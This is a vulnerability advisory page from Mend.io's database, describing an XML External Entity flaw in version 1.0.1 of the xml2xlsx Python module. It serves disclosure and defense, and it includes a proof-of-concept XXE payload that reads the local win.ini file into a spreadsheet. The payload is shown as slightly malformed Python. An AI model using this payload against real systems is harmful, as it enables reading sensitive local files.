Vulnerabilities
Projects
Vulnerability Disclosure
About Us
Contact Us
Mend.io Vulnerability Database
What is a CVE vulnerability ID? 
What is a WS vulnerability ID?
What is an MSC vulnerability ID?
New vulnerability? Tell us about it!
What is a WS vulnerability ID?
What is an MSC vulnerability ID?
We found results for “”
WS-2021-0112
Date: May 20, 2021
Overview
In 'xml2xlsx' PyPi module version 1.0.1 is vulnerable to XML External Entity vulnerability as the function `xml2xlsx()` does not restrict external entities while parsing the specially crafted XML document. Due to this flaw an attacker could read local files by defining an external entity with a file:// URI.Details
The PyPi module 'xml2xlsx' is vulnerable to XML External Entity vulnerability as the function `xml2xlsx()` does not restrict external entities while parsing the specially crafted XML document. Due to this flaw an attacker could read local files by defining an external entity with a file:// URI.PoC Details
The function `xml2xlsx()` does not restrict external entities while parsing the XML data. By leveraging this flaw, an attacker can read an arbitrary file to retain sensitive information as shown in the POC. A file with the name "test.xlsx" will be created, exposing the contents of the `win.ini` file.PoC Code
from xml2xlsx import xml2xlsx template_id = """ <!--?xml version="1.0" ?--> <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]> <sheet title="test"> <row><cell>vulnerable</cell></row> <row><cell>&ent;</cell></row> </sheet> // ----------------------------------- f = open('test.xlsx', 'wb') f.write(xml2xlsx(template_id)) f.close()Affected Environments
1.0.1Prevention
No fixLanguage: Python
Good to know:
Improper Restriction of XML External Entity Reference ('XXE')
CWE-611
Upgrade Version
No fix version available
| Base Score: |
|
|---|---|
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | None |
| User Interaction (UI): | None |
| Scope (S): | Unchanged |
| Confidentiality (C): | High |
| Integrity (I): | None |
| Availability (A): | None |